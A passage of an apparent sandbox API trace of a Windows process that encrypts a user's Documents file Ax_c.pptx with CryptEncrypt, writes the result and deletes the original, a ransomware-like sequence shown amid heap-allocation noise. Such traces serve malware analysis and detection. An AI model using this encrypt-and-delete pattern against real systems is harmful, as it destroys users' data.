[0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0215.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0215.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabce0 | out: hHeap=0x2af0000) returned 1 [0215.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0215.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9cae0 | out: hHeap=0x2af0000) returned 1 [0215.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0215.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0215.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0215.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0215.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0215.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.314] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0215.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0215.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0215.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0215.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0215.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0215.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0215.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0215.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0215.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0215.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0215.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0215.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabd28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.316] CryptEncrypt (in: hKey=0x9e1d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x632a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x6330) returned 1 [0215.316] CharLowerBuffW (in: lpsz="byte[25392]", cchLength=0xb | out: lpsz="byte[25392]") returned 0xb [0215.316] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.316] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabb18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.317] CryptEncrypt (in: hKey=0x9e1d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a9cae0*, pdwDataLen=0x8cef60*=0x632a, dwBufLen=0x6330 | out: pbData=0x2a9cae0*, pdwDataLen=0x8cef60*=0x6330) returned 1 [0215.329] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.329] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.329] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.329] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.329] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.330] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.333] WriteFile (in: hFile=0x504, lpBuffer=0x2a8a138*, nNumberOfBytesToWrite=0x6330, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8a138*, lpNumberOfBytesWritten=0x8cf5e4*=0x6330, lpOverlapped=0x0) returned 1 [0215.335] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0215.335] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0215.335] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.335] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.335] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab9b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0215.336] CryptDestroyKey (hKey=0x9e1d38) returned 1 [0215.336] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.336] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.336] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.336] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.336] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.336] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.336] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.336] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.336] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.336] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.336] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.336] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.336] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.336] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.336] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.337] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.337] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f00, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0215.337] CryptReleaseContext (hProv=0xa7bef0, dwFlags=0x0) returned 1 [0215.337] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.337] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.337] FreeLibrary (hLibModule=0x76390000) returned 1 [0215.337] CloseHandle (hObject=0x510) returned 1 [0215.338] CloseHandle (hObject=0x504) returned 1 [0215.342] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.342] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.342] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Ax_c.pptx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Ax_c.pptx", lpFilePart=0x8cedf4*="Ax_c.pptx") returned 0x23 [0215.342] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Ax_c.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\ax_c.pptx")) returned 0x20 [0215.342] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Ax_c.pptx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2107f870, ftCreationTime.dwHighDateTime=0x1d5bce9, ftLastAccessTime.dwLowDateTime=0x73686bb0, ftLastAccessTime.dwHighDateTime=0x1d5d46b, ftLastWriteTime.dwLowDateTime=0x73686bb0, ftLastWriteTime.dwHighDateTime=0x1d5d46b, nFileSizeHigh=0x0, nFileSizeLow=0x632a, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Ax_c.pptx", cAlternateFileName="AX_C~1.PPT")) returned 0x9e1cb8 [0215.342] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Ax_c.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\ax_c.pptx")) returned 1 [0215.349] FindNextFileW (in: hFindFile=0x9e1cb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2107f870, ftCreationTime.dwHighDateTime=0x1d5bce9, ftLastAccessTime.dwLowDateTime=0x73686bb0, ftLastAccessTime.dwHighDateTime=0x1d5d46b, ftLastWriteTime.dwLowDateTime=0x73686bb0, ftLastWriteTime.dwHighDateTime=0x1d5d46b, nFileSizeHigh=0x0, nFileSizeLow=0x632a, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Ax_c.pptx", cAlternateFileName="AX_C~1.PPT")) returned 0 [0215.349] FindClose (in: hFindFile=0x9e1cb8 | out: hFindFile=0x9e1cb8) returned 1 [0215.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38544e8 | out: hHeap=0x2af0000) returned 1 [0215.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0215.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.350] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0215.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0215.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0215.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0215.351] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0215.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0215.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0215.351] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0215.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0215.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0215.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0215.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854830 [0215.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0215.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0215.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0215.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0215.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0215.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0215.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x48) returned 0x2a5d7f0 [0215.352] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Ax_c.pptx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Ax_c.pptx", lpFilePart=0x8cf650*="Ax_c.pptx") returned 0x23 [0215.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d7f0 | out: hHeap=0x2af0000) returned 1 [0215.353] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Ax_c.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\ax_c.pptx")) returned 0xffffffff [0215.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854830 | out: hHeap=0x2af0000) returned 1 [0215.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0215.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.353] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0215.353] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.353] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0215.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0215.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0215.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0215.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0215.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0215.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) 